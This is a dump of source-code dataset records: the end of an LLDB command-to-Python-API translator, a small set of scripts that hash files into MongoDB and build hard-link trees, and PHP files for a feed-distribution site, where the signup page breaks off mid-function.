\"lldb.SBFrame.FindRegister\",\n \"lldb.SBFrame.GetRegisters\",\n ],\n\n # Memory Commands\n \"memory read\": [\n \"lldb.SBProcess.ReadMemory\",\n \"lldb.SBTarget.ReadMemory\",\n ],\n \"memory write\": [\n \"lldb.SBProcess.WriteMemory\",\n ],\n}\n\n# Translate regexp commands to their analagous full command.\nRegexCommands = {\n \"_regexp-break\": \"breakpoint set\",\n \"_regexp-jump\": \"thread jump\",\n}\n\ndef _breakpoint_modify_parser():\n parser = argparse.ArgumentParser(prog=\"breakpoint modify\")\n parser.add_argument('--auto-continue', '-C')\n parser.add_argument('--condition', '-c')\n parser.add_argument('--disable', '-d', action='store_const', const=True, default=None)\n parser.add_argument('--enable', '-e', action='store_const', 
const=True, default=None)\n parser.add_argument('--ignore-count', '-i')\n parser.add_argument('--one-shot', '-o')\n parser.add_argument('--queue-name', '-q')\n parser.add_argument('--thread-index', '-x')\n parser.add_argument('--thread-name', '-T')\n return parser\n\nCommandParsers = {\n \"breakpoint modify\": _breakpoint_modify_parser(),\n}\n\nCommandFlagAPIs = {\n \"breakpoint modify\": {\n \"auto_continue\": \"lldb.SBBreakpoint.SetAutoContinue\",\n \"condition\": \"lldb.SBBreakpoint.SetCondition\",\n \"disable\": \"lldb.SBBreakpoint.SetEnabled(False)\",\n \"enable\": \"lldb.SBBreakpoint.SetEnabled(True)\",\n \"ignore_count\": \"lldb.SBBreakpoint.SetIgnoreCount\",\n \"one_shot\": \"lldb.SBBreakpoint.SetOneShot\",\n \"queue_name\": \"lldb.SBBreakpoint.SetQueueName\",\n \"thread_index\": \"lldb.SBBreakpoint.SetThreadIndex\",\n \"thread_name\": \"lldb.SBBreakpoint.SetThreadName\",\n }\n}\n\n# [one, two, three] -> \"(one|two|three)\\b\"\nKnownCommands = re.compile(r\"({})\\b\".format(\n \"|\".join(CommandAPIs.keys() + RegexCommands.keys())))\n\[email protected](\"topython\")\ndef topython(debugger, command, context, result, _internal):\n \"\"\"Translate LLDB commands to Python API\"\"\"\n\n if not command:\n result.SetError(\"Usage: topython <lldb-command>\")\n return\n\n # Expand aliases and abbreviations into their base command.\n resolve_result = lldb.SBCommandReturnObject()\n debugger.GetCommandInterpreter().ResolveCommand(command, resolve_result)\n if not resolve_result.Succeeded():\n result.SetError(\"Nonexistent command: \" + command)\n return\n expanded_command = resolve_result.GetOutput()\n\n # Match the fully resolved command against supported commands. In addition\n # to checking for a known command, this also strips flags and arguments.\n match = KnownCommands.match(expanded_command)\n if not match:\n result.SetError(\"Unsupported command: \" + command)\n return\n known_command = match.group(0)\n\n # Convert regex commands into core commands.\n if known_command in RegexCommands:\n known_command = RegexCommands[known_command]\n\n parser = CommandParsers.get(known_command)\n if parser:\n command_args = expanded_command[len(known_command):]\n parsed_args, _ = parser.parse_known_args(shlex.split(command_args))\n\n # Exrtract just the flag names given in the command.\n command_flags = [\n name\n for name, value in vars(parsed_args).iteritems()\n if value is not None\n ]\n\n if command_flags:\n flagAPIs = CommandFlagAPIs[known_command]\n for flag in command_flags:\n _print_help(flagAPIs[flag])\n return\n\n APIs = CommandAPIs.get(known_command)\n if APIs is None:\n result.SetError(\"Incomplete support, missing API info for `{}`\".format(command))\n return\n\n if len(APIs) > 2:\n # Print just the APIs by name, but not their help() documentation, to\n # avoid printing too much detail.\n for API in APIs:\n print API\n return\n\n for API in APIs:\n _print_help(API)\n\ndef _print_help(API):\n match = re.match(r\"[^(]+\", API)\n assert match\n help(match.group(0))\n # Also print full API when it contains parameter info.\n if \"(\" in API:\n print API\n" } ]
2
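topython.py above joins its known command names into a single alternation regex and matches the resolved command against it. A standalone sketch of that matching step (hypothetical; it runs without lldb, and sorting by length keeps longer commands from being shadowed by shorter prefixes in the alternation):

```python
import re

known = ["breakpoint set", "breakpoint modify", "thread jump"]
pattern = re.compile(r"({})\b".format(
    "|".join(re.escape(cmd) for cmd in sorted(known, key=len, reverse=True))))

match = pattern.match("breakpoint modify -i 0 --enable bogus-args")
print(match.group(0) if match else "unsupported")  # breakpoint modify
```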
rednutsoftware/hashed_link_tree
https://github.com/rednutsoftware/hashed_link_tree
aa2199b7a40e77c634ea09123e2fcdb404fe2e97
525e8aa8721e5b974d641442a23f69ad4a0932a0
d09149b99a8229742553f97775f541c7a472dcde
refs/heads/master
2020-06-21T16:55:09.699256
2020-02-06T08:37:04
2020-02-06T08:37:04
197,507,865
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5608552694320679, "alphanum_fraction": 0.5756579041481018, "avg_line_length": 17.42424201965332, "blob_id": "28b7a20c21c2f7df6de6d6f7e09b76602a6b64d6", "content_id": "9d23f6864550497f16f887bbda1bf8586f0e0481", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 608, "license_type": "permissive", "max_line_length": 86, "num_lines": 33, "path": "/bin/dump_db.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nLOG=\"$LOG_DIR/dump_db.log\"\nDMP_DIR=$(date +\"$DATA_DIR/mongo_dump_%Y%m%d%H%M%S\")\nDMP_TBZ=\"${DMP_DIR}.tbz\"\n\ncd \"${CUR_DIR}\"\n\n#\numask 0\n\n## dump database\ndate +\"==== %c: BEGIN dump database\" | tee -a $LOG\n\nmongodump -o $DMP_DIR 2>&1 | tee -a $LOG\ntar cjfv \"$DMP_TBZ\" -C \"$(dirname $DMP_DIR)\" \"$(basename $DMP_DIR)\" 2>&1 | tee -a $LOG\nrm -rf $DMP_DIR 2>&1 | tee -a $LOG\n\ndate +\"---- %c: END dump database\" | tee -a $LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5062440037727356, "alphanum_fraction": 0.5216138362884521, "avg_line_length": 27.88888931274414, "blob_id": "9fa0c7d1081542b127ffa42c70c7d5ddc74bc463", "content_id": "095921967beb6b323124ad86875c70ea3fc663de", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1041, "license_type": "permissive", "max_line_length": 84, "num_lines": 36, "path": "/bin/check_tree.py", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport sys\nimport pymongo\nimport time\nfrom stat import *\n\nfiles=0\n\ndef visitcollection( lbase, collection, limit=0 ):\n global files\n print( \"limit[%d]\" % ( limit ) )\n for rec in collection.find():\n files += 1\n md5 = rec[ 'md5' ]\n path = rec[ 'path' ]\n ldir = os.path.join( lbase, md5[ 0 ], md5[ 1 ], md5[ 2 ] )\n lpath = os.path.join( ldir, md5 )\n if ( files == limit ):\n return\n if ( os.path.exists( lpath ) ):\n nlink = os.stat( lpath ).st_nlink\n if ( nlink == 1 ):\n print( \"STRAY[%s]<-[%s]\" % ( lpath, path ) )\n else:\n print( \"NTFND[%s]<-[%s]\" % ( lpath, path ) )\n\nif __name__ == '__main__':\n t_start = time.clock()\n mongoc = pymongo.MongoClient()\n db = mongoc.mydb\n collection = db.filehash\n visitcollection( sys.argv[1], collection, int( sys.argv[2] ) )\n t_end = time.clock()\n print( \"finally processed %d files in %f[sec].\" % ( files, (t_end - t_start) ) )\n\n" }, { "alpha_fraction": 0.5489614009857178, "alphanum_fraction": 0.5612547397613525, "avg_line_length": 30.440000534057617, "blob_id": "8a1d14968e68b859b310a2c9a2061f51266871de", "content_id": "eb081191767f431fa2338ea4cca44f7b9f9e4d2a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2359, "license_type": "permissive", "max_line_length": 84, "num_lines": 75, "path": "/bin/mk_db.py", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom stat import *\nimport pymongo\nimport hashlib\nimport time\n\ndef walktree(base, dir, callback, collection):\n '''recursively descend the directory tree rooted at top,\n calling the callback function for each regular file'''\n\n top = os.path.join(base, dir)\n for f in 
os.listdir(top):\n pathname = os.path.join(top, f)\n mode = os.stat(pathname).st_mode\n if f in [ '.@__thumb', '.git', '.svn' ] :\n print( 'Skipping %s' % pathname )\n elif S_ISDIR(mode):\n # It's a directory, recurse into it\n d = os.path.join(dir, f)\n walktree(base, d, callback, collection)\n elif S_ISREG(mode):\n # It's a file, call the callback function\n callback(base, dir, f, collection)\n else:\n # Unknown file type, print a message\n print('Skipping %s' % pathname)\n\ndef get_md5(file, size=4096):\n md5 = hashlib.md5()\n with open(file, 'rb') as f:\n for chunk in iter(lambda: f.read(size * md5.block_size), b''):\n md5.update(chunk)\n return md5.hexdigest()\n\nfiles=0\n\ndef visitfile(base, dir, fname, collection):\n global files\n files = files + 1\n if ( files % 100 == 0 ):\n print( 'processed ', files, ' files' )\n file = os.path.join( base, dir, fname )\n path = os.path.join( dir, fname )\n fstat = os.stat( file )\n md5 = get_md5( file )\n rec = {};\n rec[ 'path' ] = path\n rec[ 'size' ] = fstat.st_size\n rec[ 'mtime' ] = fstat.st_mtime\n rec[ 'md5' ] = md5\n ret = collection.find_one( { 'path': path } )\n if ret is not None:\n if ( ret[ 'md5' ] == rec[ 'md5' ] ):\n return\n ret = collection.find_one( { 'md5': md5, 'size': { '$ne': fstat.st_size } } )\n if ret is not None:\n print( 'different size but same md5:', rec, ret )\n return\n ret = collection.replace_one( { 'path': path }, rec, True )\n upd = ''\n if ret.matched_count != 0:\n upd = '(updated)'\n print( rec, upd )\n\nif __name__ == '__main__':\n t_start = time.clock()\n mongoc = pymongo.MongoClient()\n db = mongoc.mydb\n collection = db.filehash\n walktree(sys.argv[1], sys.argv[2], visitfile, collection)\n t_end = time.clock()\n print( \"finally processed %d files in %f[sec].\" % ( files, (t_end - t_start) ) )\n\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.75, "avg_line_length": 27, "blob_id": "81fd9d125282b57982523def6cd78ba04b7f7981", "content_id": "f33b8f607172315e5caceb5e0cbeb25a0d0a2569", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "permissive", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "# hashed_link_tree\nhash files and make (hard) link tree\n" }, { "alpha_fraction": 0.561170220375061, "alphanum_fraction": 0.5744680762290955, "avg_line_length": 13.745098114013672, "blob_id": "5d3cc6ba45629fc81babb5ad213e673b34ce6651", "content_id": "b7324c0bb2c6e6d17cb7e2164a57f802d3eda224", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 752, "license_type": "permissive", "max_line_length": 69, "num_lines": 51, "path": "/bin/mk_db.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nMK_DB_CMD=\"$BIN_DIR/mk_db.py\"\nMK_DB_LOG=\"$LOG_DIR/mk_db.log\"\n\ncd \"${CUR_DIR}\"\n\n#\nPROFILE=/etc/profile.d/python3.bash\nif [ -f $PROFILE ]\nthen\n . 
$PROFILE\nfi\n\nif [ $# -lt 2 ]\nthen\n echo \"usage: $PROG <HASH_BASE_DIR> <HASH_DIR1> [<HASH_DIR2> ...]\"\n exit\nfi\n\n#\numask 0\n\n## make database\nHASH_BASE_DIR=$1\nshift\n\ndate +\"==== %c\" | tee -a $MK_DB_LOG\n\nfor d in $*\ndo\n echo \"making database for $HASH_BASE_DIR/$d\" | tee -a $MK_DB_LOG\n $MK_DB_CMD $HASH_BASE_DIR $d | tee -a $MK_DB_LOG 2>&1\n date | tee -a $MK_DB_LOG\ndone\n\necho \"----\" | tee -a $MK_DB_LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5835654735565186, "alphanum_fraction": 0.597493052482605, "avg_line_length": 14.608695983886719, "blob_id": "c891620d02bc48cad25ce93d8583609c3ca8c9d9", "content_id": "9a0e5b641f13be89051e129be454f3d8119d6ada", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 718, "license_type": "permissive", "max_line_length": 71, "num_lines": 46, "path": "/bin/check_tree.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nCHECK_TREE_CMD=\"$BIN_DIR/check_tree.py\"\nCHECK_TREE_LOG=\"$LOG_DIR/check_tree.log\"\n\ncd \"${CUR_DIR}\"\n\n#\nPROFILE=/etc/profile.d/python3.bash\nif [ -f $PROFILE ]\nthen\n . $PROFILE\nfi\n\nif [ $# -lt 1 ]\nthen\n echo \"usage: $PROG <LINK_BASE_DIR> [<LIMIT>]\"\n exit\nfi\n\n#\numask 0\n\n## check files\nLINK_BASE_DIR=\"$1\"\nLIMIT=\"${2:-0}\"\n\ndate +\"==== %c: BEGIN check link tree\" | tee -a $CHECK_TREE_LOG\n\n$CHECK_TREE_CMD \"$LINK_BASE_DIR\" \"$LIMIT\" 2>&1 | tee -a $CHECK_TREE_LOG\n\ndate +\"---- %c: END check link tree\" | tee -a $CHECK_TREE_LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5810276865959167, "alphanum_fraction": 0.5955204367637634, "avg_line_length": 15.14893627166748, "blob_id": "65c046cd064512bcbbedc9c545d72bcd8fa85204", "content_id": "d48353adaffeb736b0236f77afb43953a85b63bf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 759, "license_type": "permissive", "max_line_length": 86, "num_lines": 47, "path": "/bin/link_tree.sh", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nPROG=\"$(basename $0)\"\nCUR_DIR=\"$(pwd)\"\n\ncd $(dirname $0)\nBIN_DIR=\"$(pwd)\"\n\ncd ..\nTOP_DIR=\"$(pwd)\"\nLOG_DIR=\"$TOP_DIR/log\"\nDATA_DIR=\"$TOP_DIR/data\"\nETC_DIR=\"$TOP_DIR/etc\"\n\nLINK_TREE_CMD=\"$BIN_DIR/link_tree.py\"\nLINK_TREE_LOG=\"$LOG_DIR/link_tree.log\"\n\ncd \"${CUR_DIR}\"\n\n#\nPROFILE=/etc/profile.d/python3.bash\nif [ -f $PROFILE ]\nthen\n . 
$PROFILE\nfi\n\nif [ $# -lt 2 ]\nthen\n echo \"usage: $PROG <FILE_BASE_DIR> <LINK_BASE_DIR> [<LIMIT>]\"\n exit\nfi\n\n#\numask 0\n\n## link files\nFILE_BASE_DIR=\"$1\"\nLINK_BASE_DIR=\"$2\"\nLIMIT=\"${3:-0}\"\n\ndate +\"==== %c: BEGIN make link tree\" | tee -a $LINK_TREE_LOG\n\n$LINK_TREE_CMD \"$FILE_BASE_DIR\" \"$LINK_BASE_DIR\" \"$LIMIT\" 2>&1 | tee -a $LINK_TREE_LOG\n\ndate +\"---- %c: END make link tree\" | tee -a $LINK_TREE_LOG\n\n# EOF\n" }, { "alpha_fraction": 0.5358565449714661, "alphanum_fraction": 0.5517928004264832, "avg_line_length": 29.393939971923828, "blob_id": "ad64dff70284c94030053a2a8624ce48ed28a2ff", "content_id": "658c29070d8d4686e3cb52370c289fd1d61421f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1004, "license_type": "permissive", "max_line_length": 84, "num_lines": 33, "path": "/bin/link_tree.py", "repo_name": "rednutsoftware/hashed_link_tree", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport os\nimport sys\nimport pymongo\nimport time\n\nfiles=0\n\ndef visitcollection( fbase, lbase, collection, limit=0 ):\n global files\n for rec in collection.find():\n files += 1\n md5 = rec[ 'md5' ]\n path = rec[ 'path' ]\n ldir = os.path.join( lbase, md5[ 0 ], md5[ 1 ], md5[ 2 ] )\n lpath = os.path.join( ldir, md5 )\n fpath = os.path.join( fbase, path )\n if files == limit:\n return\n if ( os.path.exists( fpath ) and not os.path.exists( lpath ) ):\n os.makedirs( ldir, exist_ok=True )\n os.link( fpath, lpath )\n print( \"[%s]->[%s]\" % ( fpath, lpath ) )\n\nif __name__ == '__main__':\n t_start = time.clock()\n mongoc = pymongo.MongoClient()\n db = mongoc.mydb\n collection = db.filehash\n visitcollection( sys.argv[1], sys.argv[2], collection, int( sys.argv[3] ) )\n t_end = time.clock()\n print( \"finally processed %d files in %f[sec].\" % ( files, (t_end - t_start) ) )\n\n" } ]
8
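link_tree.py and check_tree.py above both derive a hard-link location from a file's MD5 by nesting the first three hex digits as directories. A tiny sketch of that path computation (hypothetical helper; no filesystem links are created):

```python
import os

def hashed_link_path(link_base, md5_hex):
    # bucket by the first three hex digits to keep directories small
    return os.path.join(link_base, md5_hex[0], md5_hex[1], md5_hex[2], md5_hex)

print(hashed_link_path("/links", "d41d8cd98f00b204e9800998ecf8427e"))
# /links/d/4/1/d41d8cd98f00b204e9800998ecf8427e
```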
TheProjecter/watercooler-content-distribution
https://github.com/TheProjecter/watercooler-content-distribution
90243edd1d95d1b61b5f4ffa197466042c63557f
1f289da8fbcb5f8191b6c306557662863f13b55c
ec11cd65ae2dd703d65f7a395fd53bb29b06fe33
refs/heads/master
2021-01-10T15:13:08.433552
2010-06-11T01:34:16
2010-06-11T01:34:16
43,166,857
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5531034469604492, "alphanum_fraction": 0.5586206912994385, "avg_line_length": 32, "blob_id": "bcca076e7e7bdb04bff272dc5a1f5dd40ac04d93", "content_id": "0fb9725b29cbba42b9e1adeda5a34be221b479e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 725, "license_type": "no_license", "max_line_length": 214, "num_lines": 22, "path": "/www/trunk/getStories.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\ninclude_once('db_init.php');\nif (isset($_REQUEST['id'])) {\n $feed = Feed::find('id', $_REQUEST['id']);\n if ($feed === NULL)\n echo '<h1>Feed not found</h1>';\n else\n echo getFeedOutput($feed);\n}\n\nfunction getFeedOutput($feed) {\n $stories = $feed->stories->get(array('url', 'title', 'content', 'timestamp'), 'timestamp');\n $contents = '<ul>';\n foreach ($stories as $story)\n {\n $date = date('F\\ j\\,\\ Y\\ g:i\\ A\\ T',$story['timestamp']);\n $contents .= \"<li class=\\\"story\\\"><h3><a href=\\\"{$story['url']}\\\" target=\\\"_blank\\\">{$story['title']}</a></h3><div class=\\\"storyDate\\\">{$date}</div><div class=\\\"storyContent\\\">{$story['content']}</div></li>\";\n }\n $contents .= '</ul>';\n\n return $contents;\n}" }, { "alpha_fraction": 0.6665307879447937, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 37.7315788269043, "blob_id": "53d75494c4267ef6f7e55175ee4da8e033814c33", "content_id": "24395a8d41a41b633e765a3e64022fe0bc3a0e02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 7359, "license_type": "no_license", "max_line_length": 79, "num_lines": 190, "path": "/www/trunk/db_mysql.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<?php\nrequire_once('db.php');\n\n/* class MySQLDBObject provides a base class for all classes which\n represent objects in a MySQL database\n*/\nclass MySQLDBObject extends DatabaseObject {\n /* $pdo is defined here so sibling classes to MySQLDB can access its\n PDO and thus perform low-level operations on a given MySQL database */\n protected $pdo;\n\n /* $userattrs_to_cols is an associative array mapping attribute names given \n as the $userinfo parameter to methods in classes derived from this one to\n column names in the MySQL database. Note that the following attributes are\n missing and require special handling\n 'carrier': column 'cid' needs to be looked up in 'carriors' table by\n 'carrior_name' and entered in user table under column 'cid' \n 'send_email', \n 'send_sms_text',\n 'send_sms_link': reception methods need to be accessed in 'receptions'\n table\n 'feeds': feeds need to be accessed in the 'favorites' table */\n protected static $userattrs_to_cols = \n array('uid'=>'uid',\n\t 'id'=>'uid',\n\t 'username'=>'username',\n\t 'email'=>'email',\n\t 'password'=>'password',\n\t 'phone_number'=>'phone_number',\n\t 'phone_pin'=>'phone_status', 'phone_confirmed'=>'phone_status',\n\t 'email_pin'=>'email_status', 'email_confirmed'=>'email_status');\n\n /* $feedattrs_to_cols is an associative array mapping attribute names given \n as the $feedinfo parameter to methods in classes derived from this one to\n column names in the MySQL database. 
*/\n protected static $feedattrs_to_cols =\n array('sid'=>'sid',\n\t 'id'=>'sid',\n\t 'name'=>'source_name',\n\t 'url'=>'source_url');\n\n /* $storyattrs_to_cols is an associative array mapping attribute names given \n as the $storyinfo parameter to methods in classes derived from this one to\n column names in the MySQL database. Note that the following attributes are\n missing and require special handling\n 'feed': feed source need to be accessed in the 'feed_sources' table by\n 'fid' column\n 'category': category need to be accessed in the 'feed_categories' table\n by 'gid' column\n */\n protected static $storyattrs_to_cols =\n array('fid'=>'fid',\n\t 'id'=>'fid',\n\t 'title'=>'title',\n\t 'content'=>'content',\n\t 'url'=>'url',\n\t 'timestamp'=>'time_stamp');\n}\n\n/* class MySQLDB implements iDatabase on MySQL databases (see corresponding \n documentation)\n*/\nclass MySQLDB extends MySQLDBObject implements iDatabase {\n/* string MySQLDB::cfg_ini_main_section is the name of the section in \n the ini config files passed to MySQLDB::connectFromIni containing the\n main connection parameters. This is also the base prefix for the opts ini \n section which is named MySQLDB::cfg_ini_main_section.' opts'.\n*/\n const cfg_ini_main_section = __CLASS__;\n\n /* $dsn_cfg_vars is an array of the the connection variables from which the\n dsn (the first argument to the PDO constructor) should be constructed */\n private static $dsn_cfg_vars = array('host', 'port', 'dbname');\n\n/* function MySQLDB::__construct is the constructor for the class\n\n $pdo: (PDO object) a valid PDO object connected to the MySQL database to use\n*/\n private function __construct(PDO $pdo) {\n $this->pdo = $pdo;\n }\n\n/* function MySQLDB::setAsSiteDefault implements \n iDatabase::setAsSiteDefault (see corresponding documentation)\n*/\n public function setAsSiteDefault() {\n self::$site_db = $this;\n }\n\n/* function MySQLDB::getSiteDefault implements \n iDatabase::getSiteDefault (see corresponding documentation)\n*/\n public static function getSiteDefault() {\n return self::$site_db;\n }\n\n/* function MySQLDB::connect implements iDatabase::connect (see \n corresponding documentation)\n\n $cfg_vars: (array) the configuration variables for the database connection,\n encoded in the following key-value pairs:\n 'username': (string) the username to use to connect to the MySQL\n server\n 'password': (string) the password to use to connect to the MySQL\n server\n 'host': (string) the hostname or ip address of the mysql server,\n or NULL to use the PHP default\n 'port': (integer) the port on which to connect, or NULL to use\n the PHP default\n 'dbname': (string) the name of the database to use on the MySQL\n server (required)\n 'opts': (array) an associative array of PDO connection options,\n or NULL for PHP defaults (see PHP Manual documentation for PDO\n and the PDO MySQL driver)\n\n returns a MySQLDB object connected to the database\n*/\n public static function connect(array $cfg_vars) {\n if (!isset($cfg_vars['dbname']))\n\tthrow new InvalidArgumentException('dbname is a required key-value '.\n\t\t\t\t\t 'pair in parameter $cfg_vars');\n\n // construct dsn string\n $dsn = 'mysql:';\n foreach (self::$dsn_cfg_vars as $varname)\n if (isset($cfg_vars[$varname]))\n\t$dsn .= \"$varname={$cfg_vars[$varname]};\";\n\n // create PDO object\n $pdo = new PDO($dsn, $cfg_vars['username'], $cfg_vars['password'], \n\t\t $cfg_vars['opts']);\n\n // set PDO error mode so that we get exceptions instead of PHP errors\n 
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\n\n // construct MySQLDB object\n $c = __CLASS__;\n $db = new $c($pdo);\n\n return $db;\n }\n\n/* function MySQLDB::connectFromIni implements iDatabase::connectFromIni\n (see corresponding documentation)\n\n $cfg_file: (string) the ini file to read connection configuration variables\n from, encoded in the var-value pairs listed in the documentation\n\t for MySQLDB::connect, split into the following sections:\n\t Section 'MySQLDB' contains\n\t 'username', 'password', 'host', 'port', 'dbname'\n\t Section 'MySQLDB opts' contains\n\t the PDO connection options, encoded in var-value pairs with the\n\t\tvariable names being names of PDO constants, and the values\n\t\tbeing the desired corresponding values for the options. Note\n\t\tthat values MUST be single quoted to avoid values from being\n\t\tinterpreted by PHP (see PHP Manual documentation for PDO and\n\t\tthe PDO MySQL driver for PDO connection options).\n\n returns a MySQLDB object connected to the database\n*/\n public static function connectFromIni($cfg_file) {\n $cfg = @parse_ini_file($cfg_file, TRUE);\n if ($cfg === FALSE) {\n $e = error_get_last();\n throw new ErrorException($e['message'], 0, $e['type'], \n\t\t\t $e['file'], $e['line']);\n }\n\n $cfg_vars = $cfg[self::cfg_ini_main_section];\n\n // parse PDO options\n if (isset($cfg[self::cfg_ini_main_section.' opts']))\n foreach ($cfg[self::cfg_ini_main_section.' opts'] as $key=>$value)\n\t$cfg_vars['opts'][constant($key)] = $value;\n\n return self::connect($cfg_vars);\n }\n\n public function getFeeds() {\n static $feeds_sql = 'SELECT sid FROM feed_sources;';\n $feeds_stmt = $this->pdo->prepare($feeds_sql);\n $feeds_stmt->execute();\n /* XXX creating the objects this way relies on DB consistency (sid is not\n checked to be existent in feed_sources table) */\n $feeds_stmt->setFetchMode(PDO::FETCH_CLASS, 'MySQLFeed', \n\t\t\t array('db'=>$this));\n $feeds_result = $feeds_stmt->fetchAll();\n return new MySQLFeeds($feeds_result, $this);\n }\n}\n" }, { "alpha_fraction": 0.5847525000572205, "alphanum_fraction": 0.5943020582199097, "avg_line_length": 28.777250289916992, "blob_id": "6a659e02dc5dcac282acf801a4f26c5d39eb645a", "content_id": "a068f511129c49d0081e8e8065369c5ea322a503", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 6283, "license_type": "no_license", "max_line_length": 168, "num_lines": 211, "path": "/www/trunk/newsignup.php", "repo_name": "TheProjecter/watercooler-content-distribution", "src_encoding": "UTF-8", "text": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"\n\t \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\n<html lang=\"EN\" dir=\"ltr\" xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <meta http-equiv=\"content-type\" content=\"text/xml; charset=utf-8\" />\n <title>Sign up</title>\n <link rel=\"stylesheet\" href=\"signup.css\" title=\"signup\" />\n </head>\n <body>\n <div class=\"corner\">\n <a href=\"index.php\">home</a>\n </div>\n <h1>Sign up</h1>\n <form action=\"<?php echo $_SERVER['PHP_SELF'];?>\" method=\"post\">\n <fieldset>\n\t<legend>Personal Information</legend>\n\t<p><label for=\"name\">Username</label>\n\t <input id=\"name\" type=\"text\" name=\"userName\" maxlength=\"25\"/></p>\n\t<p><label for=\"pass\">Password</label>\n\t <input id=\"pass\" type=\"password\" name=\"userPassword\" maxlength=\"10\" /></p>\n\t<p><label for=\"repeatPass\">Repeat Password</label>\n <input id=\"repeatPass\"type=\"password\" 
name=\"userRepeatPass\" maxlength=\"10\"/></p>\n\t<p><label for=\"email\">Email</label>\n\t <input id=\"email\" type=\"text\" name=\"userEmail\" maxlength=\"50\"/></p>\n\t<p><label for=\"cell\">Cell Phone #</label>\n <input id=\"cell\" type=\"text\" name=\"userCell\" maxlength=\"10\"/></p>\n\t<p><label for=\"carrier\">Carrier</label>\n\t <select id=\"carrier\" name=\"userCarrier\">\n\t <option value=\"att\">AT&#38;T</option>\n\t <option value=\"verizon\">Verizon</option>\n\t</select></p>\n\t<p><label for=\"reception\">Default Methods of Reception</label>\n\t <object class=\"multifield\"><input type=\"checkbox\" name=\"receive_email\" value=\"yes\" />Email<br />\n\t <input type=\"checkbox\" name=\"receive_sms_text\" value=\"yes\" />SMS (Text)<br />\n\t <input type=\"checkbox\" name=\"receive_sms_link\" value=\"yes\" />SMS (Link)<br /></object></p>\n\t<p><label for=\"feeds\">Feeds</label> <br />\n\t <object class=\"multifield\">\n\t <input type=\"text\" name=\"feed1\" maxlength=\"500\"/><br />\n\t <input type=\"text\" name=\"feed2\" maxlength=\"500\"/><br />\n\t <input type=\"text\" name=\"feed3\" maxlength=\"500\"/><br />\n\t <a href=\"#\">Add More Feeds</a>\n\t </object>\n\t</p>\n\t<input class=\"rightcolumn\" type=\"submit\" name=\"submit\" value=\"Sign Up\" />\n </fieldset>\n </form>\n </div>\n <div class=\"validated\">\n <a href=\"http://validator.w3.org/check?uri=referer\"><img src=\"http://www.w3.org/Icons/valid-xhtml10\" alt=\"Valid XHTML 1.0 Strict\" /></a>\n </div>\n</body>\n</html>\n\n<?php\n /**\n * This function can be used to check the sanity of variables\n * @param string $type The type of variable can be bool, float, numeric, string, array, or object\n * @param string $string The variable name you would like to check\n * @param string $length The maximum length of the variable\n *\n * return bool\n */\n function sanityCheck($string, $type, $length){\n\n // assign the type\n $type = 'is_'.$type;\n \n if(!$type($string))\n\t {\n\t return FALSE;\n\t }\n // now we see if there is anything in the string\n elseif(empty($string))\n\t 